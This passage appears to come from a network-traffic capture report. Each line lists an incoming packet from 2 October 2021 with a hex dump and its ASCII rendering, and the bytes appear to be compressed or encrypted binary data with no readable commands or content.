2021-10-02 16:13:23 UTC	202	IN	Data Raw: 00 38 a0 48 09 15 17 0e db a6 f2 a9 0f 58 b7 7c 56 b2 d9 39 5f 4d eb 54 e2 96 65 53 86 ce f3 26 c6 0d 2d 9d 35 7c 2d 14 90 8b 89 fc 38 4f 4a 74 09 72 84 2a 25 ce 1d e0 b7 d2 ed 77 f3 a9 85 bf 8c 79 af 2e 97 6f 7f 88 9d 6b 5c 6b 7c e8 9c 39 ef 6e 0a d0 07 1c f2 a2 b4 47 cf ae 87 f3 61 ae f4 bf 35 f3 cb 6b a3 b7 ee bd 17 63 bc 08 80 6f 60 1c 80 5f 55 fc ed 03 c9 71 23 8c 19 24 af 5d d6 2d 0e 1a 8b 53 a8 60 1a a9 16 db 9a 4e 13 6d 14 e8 db 95 75 ac ef 34 8b 89 1b 9a 47 ee 48 b7 fa 47 32 6d a1 b8 89 db 73 6c b6 35 0e a9 11 06 2f 1d 26 59 cf 34 65 11 6b 56 58 b0 5f ad 3a 81 1e e8 f3 32 5f 6c c5 6c c1 32 4f 31 86 29 24 8d a3 17 9c 12 5a da d9 cc 35 72 1a a1 89 ee c4 9a c5 e5 bd 8c 78 2f aa 71 0e 4c 2b 18 af a7 2d e8 2e 9f 96 4c 66 1a cc 40 85 7e 49 39 6f 1c 67 Data Ascii: 8HX\|V9_MTeS&-5\|-8OJtr*%wy.ok\k\|9nGa5kco`_Uq#$]-S`Nmu4GHG2msl5/&Y4ekVX_:2_ll2O1)$Z5rx/qL+-.Lf@~I9og
2021-10-02 16:13:23 UTC	203	IN	Data Raw: 67 ae d7 7a 86 47 24 b9 03 bd b7 b3 e6 16 62 9c d2 b1 41 be 54 a7 d5 34 c2 36 56 8c b5 da 60 c5 ce d0 6b eb b5 fc d1 e7 56 52 75 cd c3 c7 6e 35 ec 02 68 ab 24 15 4f 96 b7 e9 06 22 17 43 3b 5a 51 9d 9c fd 30 ba 27 5c 95 53 c4 7d 0f 46 bd 22 43 3a 63 c1 11 e5 ee 80 a2 f5 ad ad 58 86 1c 08 5b b0 3e 8b 2f 1a af 80 17 9b 2f 2a 58 b2 83 f0 6d 82 90 b2 30 aa 34 f9 27 3a ec d9 fb 24 a7 bc 89 1c 48 12 96 15 1e 9d 0e 7d 02 b2 28 5f b7 d9 88 56 54 26 a1 1a 26 d7 31 94 63 49 93 19 8d b4 28 35 c9 a3 8a b4 b2 ed f3 e4 ad 0c 6d e6 60 b9 d8 e3 28 31 b5 42 e5 f3 6f f4 85 68 aa 03 d2 49 72 d0 62 6a 0d 94 f4 ea 84 ea f1 06 12 4a bc d0 89 8e 4b bb ce 27 37 4c 33 ec d4 e5 f6 0e e8 3d 27 eb 7a 9e b1 6f cb 8f 99 e0 15 5f fb da bf 20 f2 85 be 6b b4 ee 95 ab b7 fe f9 62 13 29 12 Data Ascii: gzG$bAT46V`kVRun5h$O"C;ZQ0'\S}F"C:cX[>//*Xm04':$H}(_VT&&1cI(5m`(1BohIrbjJK'7L3='zo_ kb)
2021-10-02 16:13:23 UTC	205	IN	Data Raw: ba f5 23 f3 3c b6 c2 7c 2a f8 dc 43 37 6c cb f3 83 d9 11 3a d5 ef 5b 71 1e 71 ed 9f bb ae 0c 3f 30 01 b4 ee b7 d7 12 f3 ca d9 ca 62 5f eb 59 cd 3f 85 83 47 1e a4 f5 6a 34 7e 17 c6 14 11 2f 72 be ff 00 01 3c f7 05 4f d9 07 77 e0 a9 46 82 8b fd 36 a6 1e 21 09 42 1d f5 74 5e ec 81 d5 0e 08 af 2e ab dd b2 da 19 d9 5f 32 88 fd c3 33 a2 2e 02 0b 97 a3 db 32 ad 18 92 05 39 f2 7d 9f 32 29 b5 2f ea 7a bd 85 08 ea 6f 34 a5 2a 3d a3 24 61 23 0f 50 96 7c c1 e7 03 20 a0 6f b5 77 b7 a7 b5 69 cc 29 37 ff 00 b0 a9 c9 a3 92 0c cb fd f1 58 a9 3a da 0c a7 f3 29 9c 22 16 43 8f 67 ee 6b 26 b0 97 1d 6b 57 cc 76 4e ea ff 00 3c de 05 ec aa 9a f7 e8 0b 0b bd db 1b 6f 5b 0d 79 ae 7d 3f 07 ba cc 33 ce 2c 63 a6 a9 51 fa 87 b5 9e 45 1a 7d 4e 5a c0 af c8 b5 c7 7a 57 a1 6d 13 f5 be dd Data Ascii: #<\|C7l:[qq?0b_Y?Gj4~/r<OwF6!Bt^._23.29}2)/zo4=$a#P\| owi)7X:)"Cgk&kWvN<o[y}?3,cQE}NZzWm
2021-10-02 16:13:23 UTC	206	IN	Data Raw: 3a c0 82 b3 cf 72 23 4f 59 57 1d 85 af d6 99 c3 ee 81 e8 ca f5 2f 42 76 2a 32 73 b8 31 33 e4 09 a3 da 25 b8 a4 be a7 a9 bb 1e cb 35 05 cb c6 b1 79 86 e6 13 ee 1a d6 c0 00 24 c8 f4 84 ab 49 a4 9a 4d a1 39 e8 6d 5a fa 1b 56 5c cb 39 cc b8 7f 5e 4f 52 54 18 71 b2 7c 61 66 82 68 6a f6 b2 df ea 4c 51 55 46 a2 c1 3b b5 ca 7f 42 79 a5 3f 6b ac a1 8b a6 a0 4a 9b ea b3 b5 50 56 71 e3 56 17 31 9b 5f 8c ec cb b0 c5 eb 57 de b6 5d 64 24 23 55 2d 86 aa ac bd 92 0b ba 0d 00 f6 42 43 f2 1f cc fc 3f 92 98 d1 d5 b2 98 16 4e c5 e2 cb ea 20 b6 d0 1a c0 09 30 81 86 bc a2 b0 fa aa 33 7a 9e 22 69 87 da 89 cc 4a be b0 a7 cf 08 f4 75 42 3d da 60 d0 2e 86 9d 13 a0 b3 b7 87 ac 63 ac c7 16 e4 e0 60 f3 53 a2 d5 3a d3 e5 c0 b4 2a 6c 86 bd b0 15 20 f3 ac cd 8f ed 91 fa c2 f4 8b 75 d9 Data Ascii: :r#OYW/Bv2s13%5y$IM9mZV\9^ORTq\|afhjLQUF;By?kJPVqV1_W]d$#U-BC?N 03z"iJuB=`.c`S:l u
2021-10-02 16:13:23 UTC	207	IN	Data Raw: 33 4a 79 eb e5 9a 29 b1 78 c1 ca 61 42 a7 75 06 49 aa e0 d3 31 ab d8 de 73 f1 b5 ce 35 a9 d9 ee 53 32 6d 3c 87 b1 37 ce b2 04 c6 08 d0 ec fc b3 5f e5 8e 95 69 2b cc f9 ef b4 a0 46 54 d1 b6 0c 3f 39 59 00 94 b7 c6 be 6e b9 9b 55 b1 39 cf 19 b7 61 98 6e 09 a0 4b 35 c6 0f b0 c2 b4 2e e3 99 57 6b b0 8a ae b6 8a 70 85 91 71 9f 99 cd aa 9f 69 b4 16 75 33 3c 4e d2 dc ea 61 e8 7d 4b 3b f6 4f 8a 55 90 64 fc 20 52 b5 bb 35 26 ea ae af 65 58 44 58 d1 ac 50 7a 05 4c c8 71 3c 5f 85 65 b0 fa 7f e9 23 ab 6b 82 7b 15 c5 4c 85 3f 32 78 5c 88 18 0e 3b ae 76 bd 55 0f 23 31 72 f1 7c a7 d0 89 8f 9b e6 85 56 0a eb 96 3a fd 63 17 15 45 c5 c4 5f b8 82 14 dd b0 4f ac d4 8a 7d db a9 28 64 f3 34 41 bc 9a 45 2a 8f a8 62 58 e1 dc 2e cc af 3c 12 6e 13 cd b4 7e 9e f4 b3 33 51 f9 91 dc Data Ascii: 3Jy)xaBuI1s5S2m<7_i+FT?9YnU9anK5.Wkpqiu3<Na}K;OUd R5&eXDXPzLq<_e#k{L?2x\;vU#1r\|V:cE_O}(d4AE*bX.<n~3Q
2021-10-02 16:13:23 UTC	211	IN	Data Raw: 63 84 1a 62 51 98 dc 4c 94 27 d8 29 71 ca 24 ce 53 00 3c 20 0c 95 5b 4f 64 7d d0 88 4d 6c 9a 1c 76 95 b3 50 9c 1f ba 86 fe d0 9f d3 b5 f6 cf 49 8c 77 4e e9 df 0d da d9 28 74 a2 b7 b8 fb 04 34 f4 9a 65 ac 01 10 25 16 99 cc 85 b8 d8 75 84 d6 30 3b d2 d4 41 25 76 ee bd 95 34 cc 20 32 4a 0b 70 0b 79 21 1b 21 3c ca 6c 8b 05 0d 52 05 b0 4f 74 dd ee 19 80 80 12 6c 9a c0 5b 8c 40 68 1e e2 51 73 ff 00 71 50 d8 1c ac 26 9a c2 26 b3 1d 90 64 fb 46 10 8f 2a 25 6d a8 58 30 31 f0 00 fb 20 02 80 10 84 0d 99 c4 22 64 28 82 51 81 01 41 26 d1 c0 1c 4e 14 81 30 28 26 5c 4a 90 62 13 5b 45 c8 d7 1e ea 2a 27 e1 9c d1 42 04 59 84 00 01 1e e8 bb b2 d3 1e a9 25 1a 44 45 9e 51 0b 28 9f 0a 50 82 4f c0 08 47 ea 25 64 da be 7b 2c 16 d2 0d 11 ea 98 4d 05 b0 38 28 c0 23 d2 9a c6 b4 cc Data Ascii: cbQL')q$S< [Od}MlvPIwN(t4e%u0;A%v4 2Jpy!!<lROtl[@hQsqP&&dF%mX01 "d(QA&N0(&\Jb[E'BY%DEQ(POG%d{,M8(#
2021-10-02 16:13:23 UTC	212	IN	Data Raw: 6f db 97 47 16 54 b9 bc 2d c6 2c 2d c4 f0 16 d7 9e 14 3e 76 ed bf 65 b3 52 69 a7 f0 b6 be 3b 7d 96 dd 5b a3 f8 50 e3 04 35 df 84 39 f4 95 b5 df b4 8f b2 d8 f3 c0 fe cb e5 b8 3b 68 89 3e 42 3a 66 6c 0f b1 08 ba c0 82 24 70 9b b8 2e 55 92 6b 01 35 c7 6c 86 7d c9 45 f3 3d 8e 53 63 19 2a 40 11 4a 50 2e bf 59 1f 75 2f e5 c7 ee 53 77 70 e2 3e e5 09 32 37 15 16 8c c6 56 dc 5a 8b 2b 62 d8 3b 04 74 e0 60 2d 80 f0 11 60 8c 05 b4 66 02 d9 ec 80 00 6a 0a fa 7f ca 00 1a 04 20 de ed 28 b0 54 02 b6 b8 c9 25 a3 dc 27 12 63 d2 07 88 4e 16 03 06 06 61 0d d5 03 fa 20 29 d5 60 55 21 3f b4 4f fc 42 86 b4 89 60 f6 85 c4 c4 ab db da 55 42 07 c2 01 b7 c2 37 65 60 8a 55 04 c1 5b 09 14 a2 07 28 80 67 28 96 40 6d a8 00 51 42 00 12 7f 0a 6e 6d 09 0e 71 e2 08 fc af 50 20 c7 28 07 de Data Ascii: oGT-,->veRi;}[P59;h>B:fl$p.Uk5l}E=Sc*@JP.Yu/Swp>27VZ+b;t`-`fj (T%'cNa )`U!?OB`UB7e`U[(g(@mQBnmqP (
2021-10-02 16:13:23 UTC	214	IN	Data Raw: 8f ba 22 4c 97 08 4d 1a 7b c8 80 47 72 89 00 c0 b8 55 a8 d0 04 b4 34 21 b4 66 56 9b 43 a8 54 e0 91 49 ba 4f 97 12 20 0e d7 28 6a c0 83 38 bc 9b 4f 2d f4 98 81 e6 91 d6 00 00 dd f1 f9 b4 58 c7 8e 77 02 99 f5 39 b0 33 05 60 88 a2 25 6e 2f 0e 00 81 5f 74 3d 0e 00 d1 92 13 da 03 81 e1 59 bb 01 1a 9a 29 af 2c 10 40 ca 3a 93 b4 8d a6 0a d4 70 f9 a4 82 3f 95 3c 02 03 80 bf c0 4d 60 74 4e 79 85 a8 cd 8e 86 92 48 ca f5 38 c7 28 c3 62 41 45 c2 66 d3 9d 22 26 d0 26 56 45 9c 94 00 6c 3c 91 18 41 ac dd 3b 02 73 40 c7 64 0f 13 8f 18 45 ad 22 37 03 28 30 80 e9 db 46 a3 b2 71 16 eb 07 09 e4 00 48 17 53 dd 03 7b 9a a8 ba d6 9b c4 c3 c6 0e 53 c4 b7 76 41 29 ce db 11 9e 53 5b b9 93 22 67 12 8d 1f ef 68 ec 3c 23 12 4c 52 2c 27 6c 14 01 d4 71 0c 24 10 9c d2 1c 5a 4d c2 68 9c Data Ascii: "LM{GrU4!fVCTIO (j8O-Xw93`%n/_t=Y),@:p?<M`tNyH8(bAEf"&&VEl<A;s@dE"7(0FqHS{SvA)S["gh<#LR,'lq$ZMh
2021-10-02 16:13:23 UTC	215	IN	Data Raw: 53 75 47 04 0f 24 fc 55 8b f6 92 ed d6 86 c1 c4 83 13 1a e0 d7 4f 6f d5 2e 4b 80 3b 15 95 df c8 6a 43 7b a7 66 37 10 00 5a 03 03 cd 7a 8a 47 2b c4 9d d7 5d ea 04 b6 f6 ba 8c 46 7c 1f db 7d ab a3 64 65 70 58 b6 40 68 81 3f 9d 4d 7a aa a0 29 99 88 82 46 e6 bd 6b 64 08 80 d0 78 df 1f 34 a5 58 08 62 64 4e 8f f9 02 92 40 11 34 3a 66 2b 96 4a 7e c6 98 15 68 23 fc c1 4b 70 29 51 f4 41 81 fd d5 73 13 c9 93 c5 10 1a 72 dd 35 a0 9f 48 66 f8 ab dd 23 de b6 01 54 11 b8 60 09 fd e9 52 10 23 ac 47 10 35 58 28 60 d8 fc 8c 44 40 15 85 8d 86 9c b9 19 13 3b d5 28 58 22 d9 53 e2 68 5d 45 5f 4e e2 a9 fb f7 fb 79 a3 85 d4 3e e8 f8 14 b6 ad 3a 9c ad c1 31 3d 89 83 35 fc 37 4d 1f 40 d2 c0 1c 00 05 1b d6 9c e9 b0 d7 21 94 8a 3d 2a 18 19 1a 75 2b ed c3 f5 f3 48 8a c6 09 8a b5 d3 Data Ascii: SuG$UOo.K;jC{f7ZzG+]F\|}depX@h?Mz)Fkdx4XbdN@4:f+J~h#Kp)QAsr5Hf#T`R#G5X(`D@;(X"Sh]E_Ny>:1=57M@!=*u+H
2021-10-02 16:13:23 UTC	217	IN	Data Raw: 2c d9 6f b4 0d 57 50 ce b6 52 dc fd 4f 8e bc 0a ea 5f f8 4c 76 19 b9 09 90 92 a3 c4 d3 5f b7 fc 55 e4 71 2b 73 11 09 0c 24 0d fd 5c 50 d3 96 b6 8c 87 8c ee 7e 38 1c d2 e1 6a de 6e 99 30 53 12 24 53 66 02 5b 56 02 44 eb 40 d1 54 b9 04 5c da ea 07 6a 76 01 94 41 66 6f 03 54 2e 95 51 a0 27 4a 23 64 52 39 c1 c9 83 06 28 b5 d0 d3 a0 0a d7 53 d4 c1 16 c8 7c 99 66 00 9e 0d 59 b4 f7 89 65 40 9e e1 3a ef 5d 32 dd 55 bc 2e 00 4f 7d 1e 41 14 f6 c1 0c 5c 06 86 80 56 b3 ea 66 e7 a7 d4 31 5b 70 34 60 71 34 8c 4a 5e 5c d8 e8 05 df 13 4d 6a d2 8b 47 16 c9 92 30 27 4b 1b 26 91 ee 9b 97 20 44 fb 23 e3 99 a7 0b 6b a7 02 df d4 ea 71 8a 37 ee 8c 51 2d 87 05 7d c3 f6 a4 42 ac c7 1f e9 82 6a d2 bb b9 26 62 07 7f 3b ae a0 bb 59 2c 8c 03 48 ca 40 20 64 0f 9a b3 d3 ad b7 b1 71 4c Data Ascii: ,oWPRO_Lv_Uq+s$\P~8jn0S$Sf[VD@T\jvAfoT.Q'J#dR9(S\|fYe@:]2U.O}A\Vf1[p4`q4J^\MjG0'K& D#kq7Q-}Bj&b;Y,H@ dqL
2021-10-02 16:13:23 UTC	218	IN	Data Raw: 25 94 b1 00 11 e6 9f 1e a0 84 1e a6 2a 44 c6 b8 35 d6 9b 7d 2d ab 6d 71 59 86 45 40 04 0d d2 32 38 b8 17 a5 83 1e ec 99 9a 60 c7 68 ab 0a e1 77 d1 95 02 7f a5 a6 7f 53 34 59 bd a4 80 80 89 62 d0 b2 7f 5a be 81 ad b4 5c 0a 4e c9 90 3b 44 4f 6a b5 d3 e5 67 02 f6 e4 34 e8 96 d1 a4 b5 72 eb 80 fd 42 45 a4 38 84 06 7e e6 45 75 bd 40 5b b7 6d bf 58 57 20 24 22 49 d8 9e 49 15 68 74 9e 94 9b b7 99 58 83 25 00 df e4 d0 bc 8f ea 7f 25 9a 38 24 8e df a5 0b ca 5c 14 e8 d9 42 9e 72 91 1f 68 a2 02 75 6c a5 04 33 88 7d 9e 40 99 f0 68 1e 9d 58 84 b2 98 6c 92 7b 37 83 26 af dc 82 1d 51 0a 8e f8 02 63 c6 e8 23 3a b3 02 00 2d 03 4a ac 07 cc 03 58 24 f7 fc d6 28 37 88 fc d7 b2 63 15 ac 49 fe 91 41 04 44 51 51 07 7c d4 00 20 13 14 44 01 11 fa d2 e5 8f ba 01 26 75 5b ff 00 da Data Ascii: %*D5}-mqYE@28`hwS4YbZ\N;DOjg4rBE8~Eu@[mXW $"IIhtX%%8$\Brhul3}@hXl{7&Qc#:-JX$(7cIADQQ\| D&u[
2021-10-02 16:13:23 UTC	219	IN	Data Raw: 31 2c 66 27 60 2d 06 d1 75 90 cd c1 ee 69 6c da 46 19 5d 7b 97 3f b4 93 40 29 d6 3d 8e 44 68 0f d6 8b 33 40 3c f1 f7 14 44 40 86 ce 4e 9a 98 b2 00 dd 8f 3f 14 db 1a 6e fa ac 84 fc d3 2a 9c 7f de a4 9c 8e a8 93 04 d0 8e e0 0a ed b9 fc 51 df 35 02 9e 62 62 29 84 1d 09 c8 54 15 90 40 68 e0 d1 50 a3 83 22 95 e6 4a 38 0c dc a9 fd aa fa fd 27 0f 49 98 c1 75 1e 7c 8f 14 43 4d bb 02 f1 f4 f0 0a f8 fd 4f f1 35 6f e8 08 14 28 04 00 a6 05 38 20 9c 88 90 38 1b ab 7e c2 f1 cc 0a 16 d5 d4 90 07 de b0 16 55 94 0c db 89 3f 48 9a 0c 46 f0 50 bc 73 db ec 28 fb 60 49 8f fc 8e a6 81 56 90 ae b3 10 d9 51 7c 57 73 04 98 81 3c 7c 0a 63 ad 6e 69 57 09 d8 d1 e2 a2 04 9d d4 6f 19 8a d1 e5 78 f0 68 85 22 3c 9a 44 50 44 4d 49 00 19 af 71 6e 4c 50 0d 34 dc 76 1f 35 d3 e4 f6 17 7b 1c Data Ascii: 1,f'`-uilF]{?@)=Dh3@<D@N?n*Q5bb)T@hP"J8'Iu\|CMO5o(8 8~U?HFPs(`IVQ\|Ws<\|cniWoxh"<DPDMIqnLP4v5{
2021-10-02 16:13:23 UTC	221	IN	Data Raw: e9 2b 06 2a dc 40 f3 5e e3 b9 22 44 49 a3 36 4c 90 ae cc 60 48 e2 3b d7 be 25 63 8a 77 65 db 19 88 90 0e e9 ee 5b 60 b1 91 33 58 4f 04 0d eb 62 69 01 08 71 32 db 1a dd 7a 46 41 62 80 81 df 55 76 e7 50 b7 82 82 56 db 0e 39 1f 71 11 ba 61 8a 2c 97 30 ba fa 40 81 ff 00 a8 e2 b9 07 38 f7 01 4a 82 d6 1e d2 60 f1 db e2 98 7a de f5 67 80 b3 88 6d 7e 28 75 c5 8b a3 a6 84 8d f2 07 7d d2 ca 9b aa 52 d9 43 b9 83 a6 3d cc 19 14 f6 d2 e8 9b 57 6d 77 d1 7d 80 7b 6e 8b de b4 5c 21 05 80 04 92 26 3f 5f f9 af 59 8a ce 7f a1 30 66 8e 6d 67 a7 65 42 d1 ea 86 33 05 49 86 06 af 5e b4 c5 0b db 5c 4b 10 58 6d a3 81 c7 cd 35 97 b6 43 f4 b7 c1 b2 e2 71 33 bf 31 56 d9 19 98 dc b9 89 89 04 ac 11 d8 cd 1b c9 6d 55 ad 00 c2 74 1f 5c 55 be 9f a9 25 5a d5 cb 10 92 55 59 8b 81 3d fb 50 Data Ascii: +*@^"DI6L`H;%cwe[`3XObiq2zFAbUvPV9qa,0@8J`zgm~(u}RC=Wmw}{n\!&?_Y0fmgeB3I^\KXm5Cq31VmUt\U%ZUY=P
2021-10-02 16:13:23 UTC	222	IN	Data Raw: f8 f2 b3 20 4f 38 b2 31 23 33 94 7c 87 c9 fc 98 8e df 18 48 a8 55 dc ec c5 0c 91 e1 80 15 e1 e6 ea 79 cc b5 c6 57 b7 6c 01 a8 08 86 c4 7f a7 0c 8e d9 f3 8e 51 c5 12 ba 93 cb 39 2d db 67 23 18 1a 34 e4 ad 1c 51 1a 57 69 34 33 55 82 12 0a 97 42 64 74 79 4f ee c0 23 5b 76 6b 6d d2 41 0d ba f0 58 f7 d5 26 f1 4a d1 22 c8 b2 42 9c 19 d3 2e 92 72 c8 fa 1a 86 f5 8b ec 3c 0f 66 e4 34 d2 35 45 67 21 a5 70 cc 99 1d e4 11 93 f1 d2 09 18 fd 28 c2 e8 12 7f e9 1c 8f 62 1f 19 49 3f 6b a3 1e 2e 84 80 48 e4 a4 8c 8e c6 a4 da a0 58 4a ed d1 45 11 96 30 88 81 56 69 3c 85 49 73 df 24 d5 4b e5 e2 74 9a cd 28 79 4d 49 90 82 e5 92 55 0a 85 59 78 67 51 c7 62 cc 91 d7 9e c4 99 6e 92 40 5c e1 40 01 8a 0d 5c db 63 86 e4 95 63 32 c4 e2 36 68 f2 30 b2 36 43 12 06 72 0e 0f fe 47 77 98 Data Ascii: O81#3\|HUyWlQ9-g#4QWi43UBdtyO#[vkmAX&J"B.r<f45Eg!p(bI?k.HXJE0Vi<Is$Kt(yMIUYxgQbn@\@\cc26h06CrGw
2021-10-02 16:13:23 UTC	223	IN	Data Raw: 12 60 b1 57 96 38 87 db 6b 6c df 17 6c dd 60 a8 97 27 ab 04 8a 20 c0 67 93 bc 70 87 90 31 c1 31 e9 8a 17 fd ad 91 1e e5 6e f3 57 5d d7 71 10 09 de 77 ad 39 17 ae 01 6a 70 e4 70 46 54 2b 1c b9 67 50 1c 36 a0 9e ad 9a 30 9a fb 1d 7a c6 e4 ca 65 89 24 1e ea 69 b0 12 52 00 90 ab 70 72 75 43 61 ad b6 bd 77 a5 5e 0a c9 ee ec 32 3a 33 cd 6a d2 24 2d 23 49 1a 94 fd 30 b8 43 fb 75 5f 6c af b9 2b 2c d3 c3 51 1b dc 4b 69 bc b6 9c ac 51 08 94 ce 5b 0a 84 e1 06 85 0a 75 2a a7 3c 08 5a c2 11 10 96 55 32 f1 8d 94 f2 91 7e 1f 4c ec 72 46 35 6b d2 fb cd 88 a7 cb 8b 69 4f 92 40 e9 d1 94 94 2a 4e 5b 2c a7 e4 46 35 0d 89 60 70 93 c4 1b 89 19 fa c7 2c 67 4f 35 8b 10 cb 33 a9 52 1e 24 89 73 f4 b9 0c 4f e0 0d 14 24 65 72 7b c6 b1 8f fa 77 a2 49 e9 75 09 8e 37 f1 cb 7a 6c 9a d1 Data Ascii: `W8kll`' gp11nW]qw9jppFT+gP60ze$iRpruCaw^2:3j$-#I0Cu_l+,QKiQ[u<ZU2~LrF5kiO@N[,F5`p,gO53R$sO$er{wIu7zl
2021-10-02 16:13:23 UTC	225	IN	Data Raw: 97 7f a6 c9 69 16 57 55 7a d2 39 43 01 31 7f f2 4b 6a f0 5b 02 38 5e aa c6 b3 0b 31 a3 31 56 69 a9 66 19 a7 cb a9 01 31 8c 74 01 3a dd 56 29 a8 c9 2c 70 5d a3 6b c8 c5 24 c4 86 29 02 b2 48 91 b1 f9 b8 e8 02 33 82 75 72 ad a0 03 45 14 d0 fb 64 95 70 72 04 56 00 e4 30 41 19 5e f5 5f c8 f5 04 de f2 34 62 b1 c4 a0 09 e4 9a 28 53 33 44 84 03 8c 8c 67 eb 5b 5d 8f 62 d6 a6 92 5a 2d 79 23 91 cf 4b 1f 0b 11 1e 0c df b5 55 73 9d 6c 3b 42 40 64 b5 5e ed 09 ae 4b 2b b5 57 06 5f 31 b5 65 e1 ac 59 73 80 e8 ac fc 71 c7 bd 4a d5 62 96 18 e4 b9 62 cb c2 85 a5 71 c0 c7 03 c3 14 a8 ab e6 fa 2a 49 1d 8d 54 49 62 98 a3 c9 6e 23 23 3f 5f 10 23 52 8b 82 0f f1 9e 87 fd 5f 94 8c 44 51 46 bc e5 95 80 ce 12 35 f9 31 fe 71 f4 3b 3a ba 62 05 97 d8 43 0c ad c8 83 da 4e f1 29 69 5c 7e Data Ascii: iWUz9C1Kj[8^11Vif1t:V),p]k$)H3urEdprV0A^_4b(S3Dg[]bZ-y#KUsl;B@d^K+W_1eYsqJbbq*ITIbn##?_#R_DQF51q;:bCN)i\~
2021-10-02 16:13:23 UTC	226	IN	Data Raw: 15 e0 0e 54 10 3b 61 85 00 64 6a 18 fd a1 92 43 25 89 bc 52 8f 1e 08 50 7b 5e 6c 3b 25 b0 17 58 da 2b d5 b2 e9 b6 57 91 7c 9e e2 d4 2c b5 26 79 38 ba ca dc d8 38 cf 5d 63 54 a7 dd a7 9a a4 69 46 04 8e 46 91 02 f8 ca 91 5f e2 9c 18 70 11 a2 ea a4 5b 63 cb 1b 35 79 87 24 76 78 c7 15 c3 03 f2 00 b2 e7 e9 7e 86 b7 2a f5 e4 99 61 7b 86 1e 9e 1b 53 ab 49 e3 12 48 81 8a 84 5e 2b 90 0e 34 6b d2 8e 3a a9 ec c3 ac 4f 24 cb 08 8d a6 69 39 65 64 c0 ed 46 71 9d 54 78 f6 cb 15 a2 75 6b 8d 95 8a ee 56 39 56 2e 18 48 86 08 69 33 d3 76 c3 1a af fd 2b 6f 74 9f 73 78 54 d9 4f 24 6e 79 06 47 77 2e 50 20 72 ca 4a 2f 5f ce 9a d3 d9 dc a3 ab 56 23 62 aa ca c9 55 38 fc 48 ca 15 21 4b 02 cd f3 18 03 07 54 4d 3a ca 89 15 74 79 65 6b 2a 12 42 92 2b 27 c4 8e 83 1e 24 74 dc 94 71 d6 Data Ascii: T;adjC%RP{^l;%X+W\|,&y88]cTiFF_p[c5y$vx~a{SIH^+4k:O$i9edFqTxukV9V.Hi3v+otsxTO$nyGw.P rJ/_V#bU8H!KTM:tyekB+'$tq
2021-10-02 16:13:23 UTC	227	IN	Data Raw: 94 1b 6c 13 3c 91 ec 95 a1 5a 3b 6d 7f 33 18 fb a7 02 87 92 45 20 b0 69 1c e0 ea 13 6e 59 8e d5 43 6e ad 24 73 4a 59 d8 f2 b3 34 65 83 7c 42 b7 e4 b1 2b a8 ec d0 91 5e d6 e4 6b 4d 13 2b 18 21 78 27 8e 49 09 cc 0c 58 92 39 e0 0e 59 fa 5d 73 96 98 7b 61 0d 95 af 52 2a d3 47 98 44 cf 19 90 c9 31 6c 22 46 14 95 c8 66 3a 9f 7e db 7c 61 d3 76 b1 56 7a f5 f6 e9 4b 49 e5 85 23 b3 27 d4 84 00 c5 be 5c d7 5b 17 a5 67 5f 85 78 61 b3 1b 5b 69 43 30 9d c3 a8 89 21 69 1f af 93 31 ce 72 35 5b 76 d9 4d d9 e4 37 af 5f 49 73 1f 90 bb 24 8b 03 3c 59 46 38 3c c9 18 f9 2c 79 d4 1b 16 e7 07 a7 6a 53 46 a3 42 da 40 f0 7b b2 44 e8 e2 25 e7 04 8a d8 f2 11 af 44 bd 3d 9c cb b8 49 2d 7f 2c e2 a1 54 05 19 09 4a f1 f1 91 c0 2c 12 72 c4 61 75 b8 4b ba 6e 46 56 dd 37 cd ce 85 74 88 89 Data Ascii: l<Z;m3E inYCn$sJY4e\|B+^kM+!x'IX9Y]s{aR*GD1l"Ff:~\|avVzKI#'\[g_xa[iC0!i1r5[vM7_Is$<YF8<,yjSFB@{D%D=I-,TJ,rauKnFV7t
2021-10-02 16:13:23 UTC	229	IN	Data Raw: 4e 2d da 58 a4 95 96 50 d2 c7 0b 72 40 6b 87 66 6f e7 3f f3 ab ab 76 79 ae b4 a2 48 78 4a e1 5b 88 c7 20 03 2e 72 17 3f 47 20 6a b9 a7 26 e5 60 cc d1 c6 55 26 61 5a 55 40 d2 32 e1 c8 20 72 18 3f 92 75 2d 59 c5 91 0c 89 55 02 c9 6a 22 c4 44 9c e3 91 84 5c 95 09 76 18 5e 23 54 9a 4d a6 5e 56 ab 4b 10 91 a4 9a 76 66 0f 96 fd e8 00 00 f2 fa c0 1a 59 6e ce 52 59 2c 43 67 e3 5a 28 95 7c 87 3f 6a e1 b3 1f fc 83 a7 79 f6 b8 36 fa f7 ea a4 e7 92 0b c4 2f b6 05 b8 96 76 08 14 e3 03 03 20 0d 6e 10 c4 bb a9 da 8a 33 a4 ce d6 e3 8c 48 10 b9 e8 a7 60 a9 1f 7a 96 84 32 a8 99 eb 5f 8c c5 25 b9 26 e6 90 22 2e 3f 60 24 33 67 03 04 68 fb c4 86 6a f0 d2 13 20 1e d2 23 e4 44 5e 7c 39 ba ac 67 3c 49 e5 aa 96 7d f7 a8 6e 97 33 2c 52 ca 64 55 13 22 cb 12 b3 14 71 91 95 71 a9 eb Data Ascii: N-XPr@kfo?vyHxJ[ .r?G j&`U&aZU@2 r?u-YUj"D\v^#TM^VKvfYnRY,CgZ(\|?jy6/v n3H`z2_%&".?`$3ghj #D^\|9g<I}n3,RdU"qq
2021-10-02 16:13:23 UTC	230	IN	Data Raw: c7 2b ba 46 a9 20 44 66 7e 2c fe 3e 81 ca 80 48 38 d2 a3 6e 05 21 b2 91 84 ff 00 4e 18 04 69 5f 20 0e 2a 30 5b 03 f2 73 8d 51 80 5b dd 6c 5f dc 1e 07 e0 61 45 30 33 87 0c b1 e2 75 f1 63 c6 32 34 af 06 da ad 76 0d b1 7c 92 06 92 45 45 4e 6c bc d9 3a 02 46 3d 0d 45 61 f7 9b 46 3b b0 39 91 65 86 fd 88 0c 6b 0b 31 09 19 c4 64 e5 8f 7c 7b 6d 6d 46 be d7 4e a4 e8 53 6c 2c 91 c1 15 48 e2 b0 ef 33 33 02 1f 0c 88 b8 ce 4e 72 06 ae 1b 1b 7c 16 b7 9a 53 35 1a 76 15 ec 24 8a 7c 12 f2 2f 9a 64 f2 e1 91 c9 b2 09 5d 26 d7 bc ee 1b 33 4c b6 e0 ad 24 2b 5a 7f 10 95 eb c2 62 56 64 2e 55 82 b0 c6 58 f6 40 d2 db bd 5f 60 a6 7d cc 92 bb b4 4f 7d 15 25 91 11 4f 87 03 00 11 8f ad 0a 67 70 b7 31 74 88 34 07 92 82 0a 94 1c 15 07 79 2a a3 39 d5 4f 71 34 b6 65 db a8 bc 49 28 63 0c Data Ascii: +F Df~,>H8n!Ni_ 